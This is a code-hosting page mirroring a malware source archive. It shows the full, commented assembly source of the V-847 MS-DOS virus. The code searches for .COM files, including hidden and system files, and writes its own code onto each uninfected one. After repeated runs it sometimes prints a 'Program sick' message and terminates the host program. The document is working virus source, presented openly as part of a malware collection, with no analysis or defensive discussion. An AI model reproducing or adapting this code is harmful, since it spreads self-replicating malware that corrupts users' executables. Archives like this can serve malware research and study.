ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
b077d1c807
MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.v-847.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

150 lines
3.0 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

page ,132
name V847
title The V-847 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
timer equ 6C
olddta equ 80
virlen equ offset endcode - offset start
smalcod equ offset endcode - offset transf
buffer equ offset endcode + 100
newdta equ offset endcode + 10
fname = newdta + 1E
virlenx = offset endcode - offset start
newid = offset ident + virlenx + 100
start:
jmp virus
ident dw 'VI'
counter db 0
allcom db '*.COM',0
vleng dw 44F ;Unused
progbeg dd 10000h
eof dw ?
handle dw ?
virus:
mov ax,cs ;Move program code
add ax,1000 ; 64K bytes forward
mov es,ax
inc [counter]
mov si,offset start
xor di,di
mov cx,virlen
rep movsb
mov dx,newdta ;Set new Disk Transfer Address
mov ah,1A ;Set DTA
int 21
mov dx,offset allcom ;Search for '*.COM' files
mov cx,110b ;Normal, Hidden or System
mov ah,4E ;Find First file
int 21
jc done ;Quit if none found
mainlp:
mov dx,offset fname
mov ax,3D02 ;Open file in Read/Write mode
int 21
mov [handle],ax ;Save handle
mov bx,ax
push es
pop ds
mov dx,buffer
mov cx,0FFFF ;Read all bytes
mov ah,3F ;Read from handle
int 21 ;Bytes read in AX
add ax,buffer
mov cs:[eof],ax ;Save pointer to the end of file
db 3E ;Force DS: prefix
cmp [newid],'VI' ;Infected?
je close ;Go find next file
xor cx,cx ;Go to file beginning
mov dx,cx
mov bx,cs:[handle]
mov ax,4200 ;LSEEK from the beginning of the file
int 21
jc close ;Leave this file if error occures
mov dx,0 ;Write the whole code (virus+file)
mov cx,cs:[eof] ; back onto the file
mov bx,cs:[handle]
mov ah,40 ;Write to handle
int 21
close:
mov bx,cs:[handle]
mov ah,3E ;Close the file
int 21
push cs
pop ds ;Restore DS
mov ah,4F ;Find next matching file
mov dx,newdta
int 21
jc done ;Exit if all found
jmp mainlp ;Otherwise loop again
done:
mov dx,olddta ;Restore old Disk Transfer Address
mov ah,1A ;Set DTA
int 21
cmp [counter],5 ;If counter goes above 5,
jb progok ; the program becomes "sick"
mov ax,40
mov ds,ax ;Get the system timer value
mov ax,word ptr ds:[timer]
push cs
pop ds ;Restore DS
and ax,1 ;At random (if timer value is odd)
jz progok ; display the funny message
mov dx,offset message
mov ah,9 ;Print string
int 21
int 20 ;Terminate program
message db 'Program sick error:Call doctor or '
db 'buy PIXEL for cure description',0A,0Dh,'$'
progok:
mov si,offset transf ;Move this part of code
mov cx,smalcod ;Code length
xor di,di ;Move to ES:0
rep movsb ;Do it
xor di,di ;Clear DI
mov word ptr cs:[progbeg],0
mov word ptr cs:[progbeg+2],es ;Point progbeg at program start
jmp cs:[progbeg] ;Jump at program start
transf:
push ds
pop es
mov si,buffer+100
cmp [counter],1
jne skip
sub si,200
skip:
mov di,offset start
mov cx,0FFFF ;Restore original program's code
sub cx,si
rep movsb
mov word ptr cs:[start],offset start
mov word ptr cs:[start+2],ds
jmp dword ptr cs:[start] ;Jump to program start
endcode label byte
int 20 ;Dummy program
int 20 ;???
dw 0 ;Unused
code ends
end start

Reference in New Issue View Git Blame Copy Permalink